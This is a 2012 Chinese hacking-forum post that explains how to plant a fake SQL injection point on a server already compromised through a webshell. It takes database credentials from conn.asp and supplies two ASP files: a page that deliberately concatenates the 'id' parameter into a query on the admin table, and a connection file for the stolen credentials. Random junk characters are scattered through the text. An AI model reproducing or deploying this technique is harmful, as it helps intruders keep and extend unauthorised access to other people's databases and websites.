找回密码
 立即注册
查看: 2188|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵
8 F+ t; o  z5 D4 b7 H9 j5 M# n8 I8 q
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
) L6 t4 j; R2 Q
+ q1 @# d; j5 L- S4 D( k4 _4 _这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!/ k. x% t1 z3 p& g2 x$ N
2 A7 G5 C$ |$ R5 p! _0 Z% ^+ z
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和6 a) _9 X0 e$ j# E3 P" {

  g5 ~6 q# A1 @* o" i2 }! v) z' N密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
" c6 A- F( L% d( N" I" X% P4 n" P+ X9 J
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
+ `) l. Y$ j) c1 P. B  `5 |1 _. \: Q+ k3 g
程序代码+ A/ }; `: G; W' A- z7 a. d2 L) H
<!--#include file="xx.asp"-->/ ?  S5 n2 `  F
<%
8 R& A" r9 u* X. Cset rs=server.createobject("ADODB.recordset")# Q5 t- ^/ p! ~# b4 l' c
id = request("id")
9 d6 f/ ]- J5 M& O2 sstrSQL = "select * from admin where id=" & id% a" f, g- A# h) ^/ ^4 F! W
rs.open strSQL,conn,1,3
7 j1 r9 U: X, Brs.close
* |* Q2 D% O3 V%>' b0 V7 E3 s6 B
6 b$ m  s  u$ h# z6 V8 s$ ]+ [
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在/ g) ^3 |, j, D" T: g4 w4 i
' v- j4 l6 Z/ E/ J
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!+ n& Y* Q! [! ]& k  L3 z* _: f$ _9 B
" X% R2 O( b- E. V! _& L' a
然后就要构造一个连接数据库的文件了,代码如下:
$ I" u* X7 F- K. i8 r1 V+ `/ b程序代码3 s6 ?3 `- W/ g1 O- ~( [0 X
<%        
5 N' I- c" [1 x7 EstrSQLServerName = "000.000.000.000"     '服务器名称或地址; m6 j1 h$ a1 D- W
strSQLDBUserName = "sqlname"         '数据库帐号! S5 y7 o/ `# R: S# E
strSQLDBPassword = "sqlpass"         '数据库密码) ^9 V1 x9 X$ B
strSQLDBName = "sqldataname"           '数据库名称$ @. _' }3 u. a& j# H/ Z5 O/ ~4 I
Set conn = Server.CreateObject("ADODB.Connection")& n7 v: V* T3 R! N
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"' u/ m* C* @  |2 V3 ]- x
conn.open strCon6 H1 b" K3 V" Z8 A0 M$ F% p. f
%>
" P2 s# O. z2 r, Q8 n' W$ H" |1 p4 j4 C' R5 `
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
+ P' r7 ~( T9 ?8 x3 ^; L
: x6 e% _! i8 ]& n就这样,正常情况下,就OK了,伪造成功……
! j8 q1 I6 q) W1 B! K3 f
" p0 K3 E9 e. r( W3 r           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表